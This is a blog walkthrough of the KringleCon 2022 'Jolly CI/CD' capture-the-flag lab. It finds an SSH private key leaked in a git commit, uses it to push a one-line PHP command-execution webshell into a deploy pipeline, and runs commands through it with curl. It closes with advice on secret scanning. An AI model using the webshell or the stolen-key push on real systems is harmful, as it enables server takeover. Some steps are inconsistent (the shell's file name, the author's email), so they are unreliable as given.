Elfen Ring - Jolly CI/CD Walkthrough

Jolly CI/CD

Difficulty Level 5/5

Exploit a CI/CD pipeline. Get hints for this challenge from Tinsel Upatree in the Elfen Ring.

After completing Prison Escape Challenge, Upon further climbiung upstairs in the game, we talk to Rippin Proudfoot who asks us to solve an vulnerability in the CI/CD pipeline and we are being asked to exploit the vulnerability and get the ring back. Upon clicking the terminal we are presented with the following information in terminal. 


Based on the highlighted text seem like PHP is used and possibly a PHP code-based payload will give us a hand as we progress. And As per the screenshot have already begun enumeration on the like what are the privileges, filesystem & etc. 

After talking to Tinsel, we find the following, “With this project, once I push a commit, a GitLab runner will automatically deploy the changes to production.WHOOPS! I didn’t mean to commit that to http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git...Unfortunately, if attackers can get in that pipeline, they can make an awful mess of things!”

Second hint: The thing about Git is that every step of development is accessible – even steps you didn't mean to take! git log can show code skeletons.

So based on update from Tinsel, make sure we are able to ping the following server gitlab.flag.net.internal. once the ping is successful lets try and clone the repository for http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git, cd into the directory and run git log command which shows us the Whoops commit action (same word used by Tinsel)

>> ping gitlab.flag.net.internal

>> git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

>> cd wordpress.flag.net.internal

>> git log


Next we deep dive on the specific commit message by using the below command

>> git show e19f653bde9ea3de6af21a587e41e7a909db1ca5



Based on the output we can see that the author knee-oh using address sprox@kringlecon.com has accidentally committed their SSH private key which has been captured in the commit log.

 

Now we can copy the SSH key, create a .ssh directory and paste the copied key. Limit the file permission on the key. Identify if SSH process is running and then add the key using ssh-add command.


Now will clone the repository using the added key and ssh method for cloning, so that we can get update rights to the repository with this newly grabbed identity


>> git clone sporx@kringlecon.com:gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git


Now navigate with “cd” command into the newly clone repo and lets see if we can add php webshell, but before that let edit the git config as per newly grabbed identity Knee-oh with the following commands


>> git config —-global user.email “sporx@kringlecon.com”

>> git config —-global user.name “knee-oh”

 

After which we add out webshell into a php file in the repository and perform git commit with a commit message and git push to push the changes to the main repository


>> echo '<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>0' > hmmm.php

>> git commit

>> git push

 

Now we can query our php webshell, if the payload has been uploaded to repo. We can now run the follow commands towards hmmm.php by supplying commands to the cmd parameter


>> curl http://wordpress.flag.net.internal/shell.php?cmd=id

>> curl http://wordpress.flag.net.internal/shell.php?cmd=pwd

>> curl http://wordpress.flag.net.internal/shell.php?cmd=ls+/


In this output we can see flag.txt in the root directory, hopefully we can cat that.

>> curl http://wordpress.flag.net.internal/shell.php?cmd=cat+/flag.txt



Security recommendations


This is a good example of depicting a supply chain risk, where a 3rd party developer may accidentally commit their Private key on the repository, that also gets replicated over the production instance. Which in turn allows the attacker push payloads and webshells to production instance allowing for fill compromise of the server. DevSecOPs practice needs to be implemented that warns the developer of credential at the commit stages to avoid pushing into the repository.

 

Troubleshoots


The whole setup for JollyCI/CD take 3-5 minutes to boot up, so be patient especially until these 2 command are successful


>> ping gitlab.flag.net.internal

>> git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git


Elfen Ring full map




Elf Ring Unlocked !

Since all the challenges were Linux ELF related, guessing that’s why called ELFen Ring






Comments

Popular posts from this blog

SANS Kringlecon 2022 Introduction

Sans Kringlecon 2022 - Christmas CTF Finale

Web Ring - Boria PCAP Mining Walkthrough